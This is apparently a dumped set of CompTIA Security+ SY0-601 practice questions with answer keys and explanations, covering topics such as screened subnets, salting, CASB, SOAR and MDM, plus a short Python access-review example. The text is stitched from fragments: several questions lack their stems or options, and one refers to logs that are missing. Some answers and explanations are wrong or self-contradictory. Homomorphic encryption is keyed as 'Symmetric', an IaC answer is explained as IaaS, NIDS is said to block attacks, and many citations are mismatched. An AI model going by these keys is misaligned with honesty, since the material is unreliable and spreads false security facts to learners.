EAP-FAST (Extensible Authentication Protocol-Flexible Authentication via Secure Tunneling) supports
mutual authentication and is designed to simplify the deployment of strong, password-based
authentication. EAP-FAST includes a mechanism for detecting rogue access points. References:
✑ CompTIA Security+ Study Guide Exam SY0-601, Chapter 4
46.A security engineer needs to create a network segment that can be used for servers that require
connections from untrusted networks.
Which of the following should the engineer implement?
A. An air gap
B. A hot site
C. A VLAN
D. A screened subnet
Answer: D
Explanation:
A screened subnet is a network segment that can be used for servers that require connections from
untrusted networks. It is placed between two firewalls, with one firewall facing the untrusted network and
the other facing the trusted network. This setup provides an additional layer of security by screening the
traffic that flows between the two networks. References: CompTIA Security+ Certification Guide, Exam
SY0-501
47.A security administrator is working on a solution to protect passwords stored in a database against
rainbow table attacks.
Which of the following should the administrator consider?
A. Hashing
B. Salting
C. Lightweight cryptography
D. Steganography
Answer: B
Explanation:
Salting is a technique that adds random data to a password before hashing it. This makes the hash
output more unique and unpredictable, and prevents attackers from using precomputed tables (such as
rainbow tables) to crack the password hash. Salting also reduces the risk of collisions, which occur when
different passwords produce the same hash.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://auth0.com/blog/adding-salt-to-hashing-a-better-way-to-store-passwords/
with malware. In contrast, TOTP (Time-based One-Time Password), HOTP (HMAC-based One-Time
Password), and token keys are more secure as they rely on cryptographic algorithms or physical devices
to generate one-time use codes, which are less susceptible to interception or unauthorized access.
Reference: 1. National Institute of Standards and Technology (NIST). (2017). Digital Identity Guidelines:
Authentication and Lifecycle Management (NIST SP 800-63B).
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63b.pdf
50.The SIEM at an organization has detected suspicious traffic coming from a workstation in its internal
network. An analyst in the SOC investigates the workstation and discovers that malware associated with
a botnet is installed on the device. A review of the logs on the workstation reveals that the privileges of
the local account were escalated to a local administrator.
To which of the following groups should the analyst report this real-world event?
A. The NOC team
B. The vulnerability management team
C. The CIRT
D. The red team
Answer: C
Explanation:
The Computer Incident Response Team (CIRT) is responsible for handling incidents and ensuring that
the incident response plan is followed. References: CompTIA Security+ Study Guide, Exam SY0-601,
Chapter 9
51.The Chief Information Security Officer (CISO) has decided to reorganize security staff to concentrate
on incident response and to outsource outbound Internet URL categorization and filtering to an outside
company. Additionally, the CISO would like this solution to provide the same protections even when a
company laptop or mobile device is away from a home office.
Which of the following should the CISO choose?
A. CASB
B. Next-generation SWG
C. NGFW
D. Web-application firewall
Answer: B
Explanation:
The solution that the CISO should choose is Next-generation Secure Web Gateway (SWG), which
provides URL filtering and categorization to prevent users from accessing malicious sites, even when
they are away from the office. NGFWs are typically cloud-based and offer multiple security layers,
including malware detection, intrusion prevention, and data loss prevention.
References:
✑ https://www.paloaltonetworks.com/cyberpedia/what-is-a-next-generation-secure-web-gateway-ng-swg
✑ CompTIA Security+ Study Guide Exam SY0-601, Chapter 4
52.After a phishing scam for a user's credentials, the red team was able to craft a payload to deploy on a
server. The attack allowed the installation of malicious software that initiates a new remote session.
Which of the following types of attacks has occurred?
A. Privilege escalation
B. Session replay
C. Application programming interface
D. Directory traversal
Answer: A
Explanation:
"Privilege escalation is the act of exploiting a bug, design flaw, or configuration oversight in an operating
system or software application to gain elevated access to resources that are normally protected from an
application or user." In this scenario, the red team was able to install malicious software, which would
require elevated privileges to access and install. Therefore, the type of attack that occurred is privilege
escalation. References: CompTIA Security+ Study Guide, pages 111-112
53.Which of the following would be BEST for a technician to review to determine the total risk an
organization can bear when assessing a "cloud-first" adoption strategy?
A. Risk matrix
B. Risk tolerance
C. Risk register
D. Risk appetite
Answer: B
Explanation:
To determine the total risk an organization can bear, a technician should review the organization's risk
tolerance, which is the amount of risk the organization is willing to accept. This information will help
determine the organization's "cloud-first" adoption strategy.
References: CompTIA Security+ Certification Exam Objectives (SY0-601)
54.During an investigation, the incident response team discovers that multiple administrator accounts
were suspected of being compromised. The host audit logs indicate a repeated brute-force attack on a
single administrator account followed by suspicious logins from unfamiliar geographic locations.
Which of the following data sources would be BEST to use to assess the accounts impacted by this
attack?
A. User behavior analytics
B. Dump files
C. Bandwidth monitors
D. Protocol analyzer output
Answer: A
Explanation:
User behavior analytics (UBA) would be the best data source to assess the accounts impacted by the
attack, as it can identify abnormal activity, such as repeated brute-force attacks and logins from
unfamiliar geographic locations, and provide insights into the behavior of the impacted accounts.
References: CompTIA Security+ Study Guide, Exam SY0-601, 4th Edition, Chapter 7: Incident
Response, pp. 338-341
55.The Chief information Security Officer has directed the security and networking team to retire the use
of shared passwords on routers and switches.
Which of the following choices BEST meets the requirements?
A. SAML
B. TACACS+
C. Password vaults
D. OAuth
Answer: B
Explanation:
TACACS+ is a protocol used for remote authentication, authorization, and accounting (AAA) that can be
used to replace shared passwords on routers and switches. It provides a more secure method of
authentication that allows for centralized management of access control policies.
References: CompTIA Security+ Study Guide, Exam SY0-601, 4th Edition, Chapter 6
56.The Chief Information Security Officer directed a risk reduction in shadow IT and created a policy
requiring all unsanctioned high-risk SaaS applications to be blocked from user access.
Which of the following is the BEST security solution to reduce this risk?
A. CASB
B. VPN concentrator
C. MFA
D. VPC endpoint
Answer: A
Explanation:
A Cloud Access Security Broker (CASB) can be used to monitor and control access to cloud-based
applications, including unsanctioned SaaS applications. It can help enforce policies that prevent access
to high-risk SaaS applications and provide visibility into the use of such applications by employees.
References: CompTIA Security+ SY0-601 Exam Objectives: 3.3 Given a scenario, implement secure
mobile solutions.
57.After a WiFi scan of a local office was conducted, an unknown wireless signal was identified. Upon
investigation, an unknown Raspberry Pi device was found connected to an Ethernet port using a single
connection.
Which of the following BEST describes the purpose of this device?
A. IoT sensor
B. Evil twin
C. Rogue access point
D. On-path attack
Answer: C
Explanation:
A Raspberry Pi device connected to an Ethernet port could be configured as a rogue access point,
allowing an attacker to intercept and analyze network traffic or perform other malicious activities.
References: CompTIA Security+ SY0-601 Exam Objectives: 3.2 Given a scenario, implement secure
network architecture concepts.
58.A security analyst reviews a company’s authentication logs and notices multiple authentication
failures. The authentication failures are from different usernames that share the same source IP address.
Which of the password attacks is MOST likely happening?
A. Dictionary
B. Rainbow table
C. Spraying
D. Brute-force
Answer: C
Explanation:
Password spraying is an attack where an attacker tries a small number of commonly used passwords
against a large number of usernames. The goal of password spraying is to avoid detection by avoiding
too many failed login attempts for any one user account. The fact that different usernames are being
attacked from the same IP address is a strong indication that a password spraying attack is underway.
59.A company was compromised, and a security analyst discovered the attacker was able to get access
to a service account.
The following logs were discovered during the investigation:
Which of the following MOST likely would have prevented the attacker from learning the service account
name?
A. Race condition testing
B. Proper error handling
C. Forward web server logs to a SIEM
D. Input sanitization
Answer: D
Explanation:
Input sanitization can help prevent attackers from learning the service account name by removing
potentially harmful characters from user input, reducing the likelihood of successful injection attacks.
References:
✑ CompTIA Security+ Certification Exam Objectives 2.2: Given a scenario, implement secure coding
techniques.
✑ CompTIA Security+ Study Guide, Sixth Edition, pages 72-73
60.HOTSPOT
You received the output of a recent vulnerability assessment.
Review the assessment and scan output and determine the appropriate remediation(s) for each device.
Remediation options may be selected multiple times, and some devices may require more than one
remediation.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All
button.
Answer:
Explanation:
61.A company reduced the area utilized in its datacenter by creating virtual networking through
automation and by creating provisioning routes and rules through scripting.
Which of the following does this example describe?
A. IaC
B. MSSP
C. Containers
D. SaaS
Answer: A
Explanation:
IaaS (Infrastructure as a Service) allows the creation of virtual networks, automation, and scripting to
reduce the area utilized in a datacenter. References: CompTIA Security+ Study Guide, Exam SY0-601,
Chapter 4
62.A global company is experiencing unauthorized logins due to credential theft and account lockouts
caused by brute-force attacks. The company is considering implementing a third-party identity provider to
help mitigate these attacks.
Which of the following would be the BEST control for the company to require from prospective vendors?
A. IP restrictions
B. Multifactor authentication
C. A banned password list
D. A complex password policy
Answer: B
Explanation:
Multifactor authentication (MFA) would be the best control to require from a third-party identity provider to
help mitigate attacks such as credential theft and brute-force attacks.
References: CompTIA Security+ Study Guide, Exam SY0-601, Chapter 2
63.Which of the following should a technician consider when selecting an encryption method for data
that needs to remain confidential for a specific length of time?
A. The key length of the encryption algorithm
B. The encryption algorithm's longevity
C. A method of introducing entropy into key calculations
D. The computational overhead of calculating the encryption key
Answer: B
Explanation:
When selecting an encryption method for data that needs to remain confidential for a specific length of
time, the longevity of the encryption algorithm should be considered to ensure that the data remains
secure for the required period.
References: CompTIA Security+ Certification Exam Objectives - 3.2 Given a scenario, use appropriate
cryptographic methods. Study Guide: Chapter 4, page 131.
D. International operations
Answer: D
Explanation:
Data sovereignty refers to the legal concept that data is subject to the laws and regulations of the
country in which it is located. International operations can impact data sovereignty as companies
operating in multiple countries may need to comply with different laws and regulations.
References:
✑ CompTIA Security+ Study Guide, Exam SY0-601, 4th Edition, Chapter 5
66.Which of the following is a cryptographic concept that operates on a fixed length of bits?
A. Block cipher
B. Hashing
C. Key stretching
D. Salting
Answer: A
Explanation:
A block cipher is a single-key (symmetric-key) encryption algorithm that operates on a fixed length of bits
at a time, using a secret key that the creator/sender uses to encipher data (encryption) and the receiver
uses to decipher it.
67.A financial institution would like to store its customer data in a cloud but still allow the data to be
accessed and manipulated while encrypted. Doing so would prevent the cloud service provider from
being able to decipher the data due to its sensitivity. The financial institution is not concerned about
computational overheads and slow speeds.
Which of the following cryptographic techniques would BEST meet the requirement?
A. Asymmetric
B. Symmetric
C. Homomorphic
D. Ephemeral
Answer: B
Explanation:
Symmetric encryption allows data to be encrypted and decrypted using the same key. This is useful
when the data needs to be accessed and manipulated while still encrypted. References: CompTIA
Security+ Study Guide, Exam SY0-601, Chapter 6
68.Which of the following is required in order for an IDS and a WAF to be effective on HTTPS traffic?
A. Hashing
B. DNS sinkhole
C. TLS inspection
D. Data masking
Answer: C
Explanation:
An IDS (Intrusion Detection System) and a WAF (Web Application Firewall) are both used to monitor and
protect web applications from common attacks such as cross-site scripting and SQL injection.
However, these attacks can also be hidden in encrypted HTTPS traffic, which uses the TLS (Transport
Layer Security) protocol to provide cryptography and authentication between two communicating
applications. Therefore, in order for an IDS and a WAF to be effective on HTTPS traffic, they need to
be able to decrypt and inspect the data that flows in the TLS tunnel. This is achieved by using a feature
called TLS inspection, which creates two dedicated TLS connections: one with the web server and
another with the client. The firewall then uses a customer-provided CA (Certificate Authority) certificate to
generate an on-the-fly certificate that replaces the web server certificate and shares it with the client.
This way, the firewall can see the content of the HTTPS traffic and apply the IDS and WAF rules
accordingly.
70.Which of the following cryptographic concepts would a security engineer utilize while implementing
non-repudiation? (Select TWO)
A. Block cipher
B. Hashing
C. Private key
D. Perfect forward secrecy
E. Salting
F. Symmetric keys
Answer: B,C
Explanation:
Non-repudiation is the ability to ensure that a party cannot deny a previous action or event.
Cryptographic concepts that can be used to implement non-repudiation include hashing and digital
signatures, which use a private key to sign a message and ensure that the signature is unique to the
signer.
References: CompTIA Security+ Certification Exam Objectives (SY0-601)
71.A security analyst needs an overview of vulnerabilities for a host on the network.
Which of the following is the BEST type of scan for the analyst to run to discover which vulnerable
services are running?
A. Non-credentialed
B. Web application
C. Privileged
D. Internal
Answer: C
Explanation:
Privileged scanning, also known as credentialed scanning, is a type of vulnerability scanning that uses a
valid user account to log in to the target host and examine vulnerabilities from a trusted user’s
perspective. It can provide more accurate and comprehensive results than unprivileged scanning, which
does not use any credentials and only scans for externally visible vulnerabilities.
72.A company uses a drone for precise perimeter and boundary monitoring.
Which of the following should be MOST concerning to the company?
A. Privacy
B. Cloud storage of telemetry data
C. GPS spoofing
D. Weather events
Answer: A
Explanation:
The use of a drone for perimeter and boundary monitoring can raise privacy concerns, as it may capture
video and images of individuals on or near the monitored premises. The company should take measures
to ensure that privacy rights are not violated.
References:
✑ CompTIA Security+ Study Guide, Exam SY0-601, 4th Edition, Chapter 8
73.An organization wants to integrate its incident response processes into a workflow with automated
decision points and actions based on predefined playbooks.
Which of the following should the organization implement?
A. SIEM
B. SOAR
C. EDR
D. CASB
Answer: B
Explanation:
Security Orchestration, Automation, and Response (SOAR) should be implemented to integrate incident
response processes into a workflow with automated decision points and actions based on predefined
playbooks.
References: CompTIA Security+ Study Guide, Exam SY0-601, Chapter 9
D. It contains the affected systems and disconnects them from the network, preventing further spread of
the attack or breach
Answer: A
Explanation:
The final phase of an incident response plan is the post-incident activity, which involves examining and
documenting how well the team responded, discovering what caused the incident, and determining how
the incident can be avoided in the future.
References:
CompTIA Security+ Certification Exam Objectives - 2.5 Given a scenario, analyze potential indicators to
determine the type of attack. Study Guide: Chapter 5, page 225.
75.As part of the lessons-learned phase, the SOC is tasked with building methods to detect if a previous
incident is happening again.
Which of the following would allow the security analyst to alert the SOC if an event is reoccurring?
A. Creating a playbook within the SOAR
B. Implementing rules in the NGFW
C. Updating the DLP hash database
D. Publishing a new CRL with revoked certificates
Answer: A
Explanation:
Creating a playbook within the Security Orchestration, Automation and Response (SOAR) tool would
allow the security analyst to detect if an event is reoccurring by triggering automated actions based on
the previous incident's characteristics. This can help the SOC to respond quickly and effectively to the
incident.
References: CompTIA Security+ Study Guide, Exam SY0-601, 4th Edition, Chapter 7: Incident
Response, pp. 352-354
76.A large enterprise has moved all its data to the cloud behind strong authentication and encryption. A
sales director recently had a laptop stolen, and later, enterprise data was found to have been
compromised from a local database.
Which of the following was the MOST likely cause?
A. Shadow IT
B. Credential stuffing
C. SQL injection
D. Man in the browser
E. Bluejacking
Answer: A
Explanation:
The most likely cause of the enterprise data being compromised from a local database is Shadow IT.
Shadow IT is the use of unauthorized applications or devices by employees to access company
resources. In this case, the sales director's laptop was stolen, and the attacker was able to use it to
access the local database, which was not secured properly, allowing unauthorized access to sensitive
data.
References:
77.A company wants to modify its current backup strategy to minimize the number of backups that would
need to be restored in case of data loss.
Which of the following would be the BEST backup strategy?
A. Incremental backups followed by differential backups
B. Full backups followed by incremental backups
C. Delta backups followed by differential backups
D. Incremental backups followed by delta backups
E. Full backup followed by different backups
Answer: B
Explanation:
The best backup strategy for minimizing the number of backups that need to be restored in case of data
loss is full backups followed by incremental backups. This strategy allows for a complete restoration of
data by restoring the most recent full backup followed by the most recent incremental backup.
Reference: CompTIA Security+ Certification Guide, Third Edition (Exam SY0-601) page 126
78.A bad actor tries to persuade someone to provide financial information over the phone in order to gain
access to funds.
Which of the following types of attacks does this scenario describe?
A. Vishing
B. Phishing
C. Spear phishing
D. Whaling
Answer: A
Explanation:
Vishing is a social engineering attack that uses phone calls or voicemail messages to trick people into
divulging sensitive information, such as financial information or login credentials.
79.Which of the following provides a catalog of security and privacy controls related to the United States
federal information systems?
A. GDPR
B. PCI DSS
C. ISO 27000
D. NIST 800-53
Answer: D
Explanation:
NIST 800-53 provides a catalog of security and privacy controls related to the United States federal
information systems.
References: CompTIA Security+ Study Guide, Exam SY0-601, 4th Edition, Chapter 3: Architecture and
Design, pp. 123-125
80.A business is looking for a cloud service provider that offers a la carte services, including cloud
backups, VM elasticity, and secure networking.
Which of the following cloud service provider types should the business engage?
A. IaaS
B. PaaS
C. XaaS
D. SaaS
Answer: A
Explanation:
Infrastructure as a Service (IaaS) providers offer a la carte services, including cloud backups, VM
elasticity, and secure networking. With IaaS, businesses can rent infrastructure components such as
virtual machines, storage, and networking from a cloud service provider.
References: CompTIA Security+ Study Guide, pages 233-234
81.A company would like to provide flexibility for employees on device preference. However, the
company is concerned about supporting too many different types of hardware.
Which of the following deployment models will provide the needed flexibility with the GREATEST amount
of control and security over company data and infrastructure?
A. BYOD
B. VDI
C. COPE
D. CYOD
Answer: D
Explanation:
Choose Your Own Device (CYOD) is a deployment model that allows employees to select from a
predefined list of devices. It provides employees with flexibility in device preference while allowing the
company to maintain control and security over company data and infrastructure. CYOD deployment
model provides a compromise between the strict control provided by Corporate-Owned, Personally
Enabled (COPE) deployment model and the flexibility provided by Bring Your Own Device (BYOD)
deployment model.
References: CompTIA Security+ Study Guide, Chapter 6: Securing Application, Data, and Host Security,
6.5 Implement Mobile Device Management, pp. 334-335
82.A cybersecurity administrator needs to implement a Layer 7 security control on a network and block
potential attacks.
Which of the following can block an attack at Layer 7? (Select TWO).
A. HIDS
B. NIPS
C. HSM
D. WAF
E. NAC
F. NIDS
G. Stateless firewall
Answer: D,F
Explanation:
A WAF (Web Application Firewall) and NIDS (Network Intrusion Detection System) are both examples of
Layer 7 security controls. A WAF can block attacks at the application layer (Layer 7) of the OSI model by
filtering traffic to and from a web server. NIDS can also detect attacks at Layer 7 by monitoring network
traffic for suspicious patterns and behaviors. References: CompTIA Security+ Study Guide, pages 94-95,
116-118
83.A security manager needs to assess the security posture of one of the organization's vendors. The
contract with the vendor does not allow for auditing of the vendor's security controls.
Which of the following should the manager request to complete the assessment?
A. A service-level agreement
B. A business partnership agreement
C. A SOC 2 Type 2 report
D. A memorandum of understanding
Answer: C
Explanation:
SOC 2 (Service Organization Control 2) is a type of audit report that evaluates the controls of service
providers to verify their compliance with industry standards for security, availability, processing integrity,
confidentiality, and privacy. A Type 2 report is based on an audit that tests the effectiveness of the
controls over a period of time, unlike a Type 1 report which only evaluates the design of the controls at a
specific point in time.
A SOC 2 Type 2 report therefore gives the security manager independent evidence of which controls the
vendor operates and how effective they were over the audited period, which is exactly what is needed
when the contract does not allow a direct audit. An SLA, a business partnership agreement or a
memorandum of understanding define obligations between the parties but provide no evidence about
the vendor's controls. References: CompTIA Security+ Study Guide: Exam SY0-601, Chapter 5
84.A security engineer is installing a WAF to protect the company's website from malicious web requests
over SSL.
Which of the following is needed to meet the objective?
A. A reverse proxy
B. A decryption certificate
C. A split-tunnel VPN
D. Load-balanced servers
Answer: B
Explanation:
A Web Application Firewall (WAF) protects web applications from attacks such as SQL injection and
cross-site scripting (XSS). It is deployed in front of the web servers to inspect incoming requests and
filter out malicious ones.
Requests sent over SSL/TLS are encrypted, so the WAF can inspect them only if it can decrypt them. To
do that it must be provisioned with the website's certificate and private key (the "decryption certificate");
it then terminates the TLS session, inspects the plaintext request, and forwards clean traffic to the web
server, normally re-encrypted. A reverse proxy on its own (option A) sees only ciphertext unless it also
holds the key, and load balancing or a split-tunnel VPN have nothing to do with inspecting content.
Because the WAF now holds the site's private key, it must be protected at least as well as the web
server itself: restricted administrative access and, ideally, key storage in an HSM.
85.A store receives reports that shoppers’ credit card information is being stolen. Upon further analysis,
those same shoppers also withdrew money from an ATM in that store.
The attackers are using the targeted shoppers’ credit card information to make online purchases.
86.Which of the following describes a maintenance metric that measures the average time required to
troubleshoot and restore failed equipment?
A. RTO
B. MTBF
C. MTTR
D. RPO
Answer: C
Explanation:
Mean Time To Repair (MTTR) is a maintenance metric that measures the average time required to
troubleshoot and restore failed equipment. By contrast, MTBF (mean time between failures) measures
how long equipment runs before it fails, RTO (recovery time objective) is the maximum downtime the
business will tolerate for a system, and RPO (recovery point objective) is the maximum amount of data
loss, expressed as time, that the business will tolerate.
References: CompTIA Security+ Certification Exam Objectives - 4.6 Explain the importance of secure
coding practices. Study Guide: Chapter 7, page 323.
87.As part of annual audit requirements, the security team performed a review of exceptions to the
company policy that allows specific users the ability to use USB storage devices on their laptops.
The review yielded the following results.
• The exception process and policy have been correctly followed by the majority of users
• A small number of users did not create tickets for the requests but were granted access
• All access had been approved by supervisors.
• Valid requests for the access sporadically occurred across multiple departments.
• Access, in most cases, had not been removed when it was no longer needed
Which of the following should the company do to ensure that appropriate access is not disrupted but
unneeded access is removed in a reasonable time frame?
A. Create an automated, monthly attestation process that removes access if an employee's
supervisor denies the approval
B. Remove access for all employees and only allow new access to be granted if the employee's
supervisor approves the request
C. Perform a quarterly audit of all user accounts that have been granted access and verify the
exceptions with the management team
D. Implement a ticketing system that tracks each request and generates reports listing which employees
actively use USB storage devices
Answer: A
Explanation:
Option A is correct. An automated monthly attestation asks each supervisor to confirm that the
exception is still needed and removes the access when the supervisor denies it, so unneeded access is
cleaned up within a month while approved access continues uninterrupted. It also addresses the review
findings directly: access that was granted without a ticket still gets reviewed, and access is no longer left
in place indefinitely after it is no longer needed. Because the process is automated, it reduces the
manual workload on the security team and improves compliance with the company policy. Option B
would disrupt appropriate access for everyone, and options C and D only report on access without
removing it.
89.Ann, a customer, received a notification from her mortgage company stating her PII may be shared
with partners, affiliates, and associates to maintain day-to-day business operations.
Which of the following documents did Ann receive?
A. An annual privacy notice
B. A non-disclosure agreement
C. A privileged-user agreement
D. A memorandum of understanding
Answer: A
Explanation:
Ann received an annual privacy notice from her mortgage company. An annual privacy notice is a
statement from a financial institution or creditor that outlines the institution's privacy policy and explains
how the institution collects, uses, and shares customers' personal information. It informs the customer
about their rights under the Gramm-Leach-Bliley Act (GLBA) and the institution's practices for protecting
their personal information.
References:
✑ CompTIA Security+ Certification Exam Objectives - Exam SY0-601
90.Which of the following environments can be stood up in a short period of time, utilizes either dummy
data or actual data, and is used to demonstrate and model system capabilities and functionality for a
fixed, agreed-upon duration of time?
A. PoC
B. Production
C. Test
D. Development
Answer: A
Explanation:
A proof of concept (PoC) environment can be stood up quickly and is used to demonstrate and model
system capabilities and functionality for a fixed, agreed-upon duration of time. This environment can
utilize either dummy data or actual data.
References: CompTIA Security+ Certification Guide, Exam SY0-501
92.A security analyst needs to implement an MDM solution for BYOD users that will allow the company
to retain control over company emails residing on the devices and limit data exfiltration that might occur if
the devices are lost or stolen.
Which of the following would BEST meet these requirements? (Select TWO).
A. Full-device encryption
B. Network usage rules
C. Geofencing
D. Containerization
E. Application whitelisting
F. Remote control
Answer: D,E
Explanation:
MDM solutions emerged to solve problems created by BYOD. With MDM, IT teams can remotely wipe
devices clean if they are lost or stolen. MDM also makes the life of an IT administrator a lot easier as it
allows them to enforce corporate policies, apply software updates, and even ensure that password
protection is used on each device. Containerization and application whitelisting are two features of MDM
that can help retain control over company emails residing on the devices and limit data exfiltration that
might occur if the devices are lost or stolen.
Containerization is a technique that creates a separate and secure space on the device for work-related
data and applications. This way, personal and corporate data are isolated from each other, and IT
admins can manage only the work container without affecting the user’s privacy. Containerization also
allows IT admins to remotely wipe only the work container if needed, leaving the personal data intact.
Application whitelisting is a technique that allows only authorized applications to run on the device. This
way, IT admins can prevent users from installing or using malicious or unapproved applications that
might compromise the security of corporate data. Application whitelisting also allows IT admins to control
which applications can access corporate resources, such as email servers or cloud storage.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.office1.com/blog/byod-vs-mdm
93.The Chief Information Security Officer wants to pilot a new adaptive, user-based authentication
method. The concept Includes granting logical access based on physical location and proximity.
Which of the following Is the BEST solution for the pilot?
A. Geofencing
B. Self-sovereign identification
C. PKl certificates
D. SSO
Answer: A
Explanation:
Geofencing is a location-based technology that allows an organization to define and enforce logical
access control policies based on physical location and proximity. Geofencing can be used to grant or
restrict access to systems, data, or facilities based on an individual's location, and it can be integrated
into a user's device or the infrastructure. This makes it a suitable solution for the pilot project to test the
adaptive, user-based authentication method that includes granting logical access based on physical
location and proximity.
Reference: CompTIA Security+ SY0-601 Official Text Book, Chapter 4: "Identity and Access
Management".
94.The Chief Executive Officer announced a new partnership with a strategic vendor and asked the
Chief Information Security Officer to federate user digital identities using SAML-based protocols.
Which of the following will this enable?
A. SSO
B. MFA
C. PKI
D. DLP
Answer: A
Explanation:
Federating user digital identities using SAML-based protocols enables Single Sign-On (SSO), which
allows users to log in once and access multiple applications without having to enter their credentials for
each one.
References:
✑ CompTIA Security+ Certification Exam Objectives 1.3: Explain authentication and access controls.
✑ CompTIA Security+ Study Guide, Sixth Edition, pages 41-42
96.A security assessment found that several embedded systems are running unsecure protocols. These
Systems were purchased two years ago and the company that developed them is no longer in business.
Which of the following constraints BEST describes the reason the findings cannot be remediated?
A. inability to authenticate
B. Implied trust
C. Lack of computing power
D. Unavailable patch
Answer: D
Explanation:
If the systems are running unsecure protocols and the company that developed them is no longer in
business, it is likely that there are no patches available to remediate the issue.
References:
✑ CompTIA Security+ Certification Exam Objectives 1.6: Given a scenario, implement secure protocols.
✑ CompTIA Security+ Study Guide, Sixth Edition, pages 35-36
97.A company would like to set up a secure way to transfer data between users via their mobile phones.
The company's top priority is utilizing technology that requires users to be in as close proximity as
possible to each other.
Which of the following connection methods would BEST fulfill this need?
A. Cellular
B. NFC
C. Wi-Fi
D. Bluetooth
Answer: B
Explanation:
NFC allows two devices to communicate only when they are very close together, typically within a few
centimetres (about 4 cm in practice, and no more than roughly 10 cm). That range requirement, not any
inherently stronger encryption, is what makes NFC the best fit for the company's requirement: an
eavesdropper has to be physically next to the users, whereas Bluetooth reaches metres, Wi-Fi tens of
metres and cellular much further.
98.A network engineer and a security engineer are discussing ways to monitor network operations.
Which of the following is the BEST method?
A. Disable Telnet and force SSH.
B. Establish a continuous ping.
C. Utilize an agentless monitor
D. Enable SNMPv3 With passwords.
Answer: C
Explanation:
An agentless monitor is the best method to monitor network operations because it does not require any
software or agents to be installed on the devices being monitored, making it less intrusive and less likely
to disrupt network operations. This method can monitor various aspects of network operations, such as
traffic, performance, and security.
CompTIA Security+ Study Guide, Sixth Edition (SY0-601), Chapter 4: Attacks, Threats, and
Vulnerabilities, Monitoring and Detection Techniques, pg. 167-170.
99.When planning to build a virtual environment, an administrator needs to achieve the following:
• Establish policies to limit who can create new VMs
• Allocate resources according to actual utilization
• Require justification for requests outside of the standard requirements
• Create standardized categories based on size and resource requirements
Which of the following is the administrator MOST likely trying to do?
A. Implement IaaS replication
B. Protect against VM escape
C. Deploy a PaaS
D. Avoid VM sprawl
Answer: D
Explanation:
The administrator is most likely trying to avoid VM sprawl, which occurs when too many VMs are created
and managed poorly, leading to resource waste and increased security risks. The listed actions can help
establish policies, resource allocation, and categorization to prevent unnecessary VM creation and
ensure proper management.
Reference: CompTIA Security+ Certification Exam Objectives, Exam SY0-601, 3.6 Given a scenario,
implement the appropriate virtualization components.
Answer: E
Explanation:
ISO 27001 is an international standard that outlines the requirements for an Information Security
Management System (ISMS). It provides a framework for managing and protecting sensitive information
using risk management processes. Acquiring an ISO 27001 certification assures customers that the
organization meets security standards and follows best practices for information security management. It
helps to build customer trust and confidence in the organization's ability to protect their sensitive
information. References: CompTIA Security+ Certification Exam Objectives, Exam Domain 1.0: Attacks,
Threats, and Vulnerabilities, 1.2 Given a scenario, analyze indicators of compromise and determine the
type of malware, p. 7
101.The compliance team requires an annual recertification of privileged and non-privileged user access.
However, multiple users who left the company six months ago still have access.
Which of the following would have prevented this compliance violation?
A. Account audits
B. AUP
C. Password reuse
D. SSO
Answer: A
Explanation:
Account audits are periodic reviews of user accounts that confirm each account is still needed, is being
used appropriately, and that access is granted and revoked in line with the organization's policies and
procedures. A regular audit (for example, one run monthly against the HR roster, or triggered by the
leaver process) would have identified the accounts of the users who left six months ago and had their
access revoked promptly, long before the annual recertification discovered them. Account audits also
surface inactive and unused accounts, so that only authorized users retain access to the company's
systems and data. An AUP, password reuse and SSO do nothing to remove access that should have
been revoked.
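As an added example (not from the study guide or the exam), the review logic behind questions 87 and 101 in Python: a monthly attestation pass that revokes access when a supervisor denies it, plus a leaver check of the kind a regular account audit performs. The data model, the 90-day unused threshold and the rule that an unanswered attestation counts as a denial are assumptions chosen for the illustration; the grants and attestations are constructed sample data.

```python
from dataclasses import dataclass
from datetime import date
from typing import Optional

# Assumed data model for a USB-storage exception grant (example only).
@dataclass
class AccessGrant:
    user: str
    supervisor: str
    granted: date
    ticket: Optional[str]         # None: access was granted without a ticket
    last_used: Optional[date]     # None: never used since it was granted
    left_company: Optional[date]  # HR termination date, if the user has left

@dataclass
class Attestation:
    user: str
    supervisor: str
    decision: Optional[str]       # "approve", "deny", or None when no reply

def review_access(grants, attestations, today, unused_days=90):
    """Return {user: reason} for every grant that should be revoked now.

    Rules, in priority order (all assumptions for this example):
      1. The user has left the company: revoke (the question 101 scenario).
      2. The supervisor denied, or never answered, the monthly attestation:
         revoke. Treating silence as denial stops access lingering forever.
      3. The access has not been used for more than `unused_days`: revoke.
    Grants matching none of these are kept, so valid access is not disrupted.
    """
    decisions = {a.user: a.decision for a in attestations}
    revoke = {}
    for g in grants:
        if g.left_company is not None and g.left_company <= today:
            revoke[g.user] = "user left company"
        elif decisions.get(g.user) in ("deny", None):
            revoke[g.user] = "supervisor denied or did not attest"
        elif g.last_used is None or (today - g.last_used).days > unused_days:
            revoke[g.user] = f"unused for more than {unused_days} days"
    return revoke

def missing_tickets(grants):
    """Users whose access bypassed the ticketing step (one of the audit findings)."""
    return sorted(g.user for g in grants if g.ticket is None)

# Constructed sample data for the demonstration.
TODAY = date(2024, 6, 1)
GRANTS = [
    AccessGrant("alice", "bob",  date(2024, 1, 10), "T-101", date(2024, 5, 28), None),
    AccessGrant("carol", "bob",  date(2023, 9, 1),  None,    date(2023, 12, 1), None),
    AccessGrant("dave",  "erin", date(2023, 3, 15), "T-077", date(2023, 11, 30), date(2023, 12, 1)),
    AccessGrant("frank", "erin", date(2024, 2, 2),  "T-150", date(2024, 5, 30), None),
]
ATTESTATIONS = [
    Attestation("alice", "bob", "approve"),
    Attestation("carol", "bob", "approve"),
    Attestation("frank", "erin", "deny"),
    # no row for dave: his supervisor never answered this month's request
]

if __name__ == "__main__":
    for user, reason in review_access(GRANTS, ATTESTATIONS, TODAY).items():
        print(f"revoke {user}: {reason}")
    print("granted without a ticket:", missing_tickets(GRANTS))
```

Alice keeps her access (approved and recently used); Carol's is revoked as unused even though her supervisor approved it, Dave's because HR recorded his departure, and Frank's because his supervisor denied the attestation. Wiring the HR feed into the same pass is what turns a once-a-year finding into a monthly non-event.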
Answer: C,D
Explanation:
An identity provider (IdP) is responsible for authenticating users and generating security tokens
containing user information. A service provider (SP) is responsible for accepting security tokens and
granting access to resources based on the user's identity.
103.During a Chief Information Security Officer (CISO) convention to discuss security awareness, the
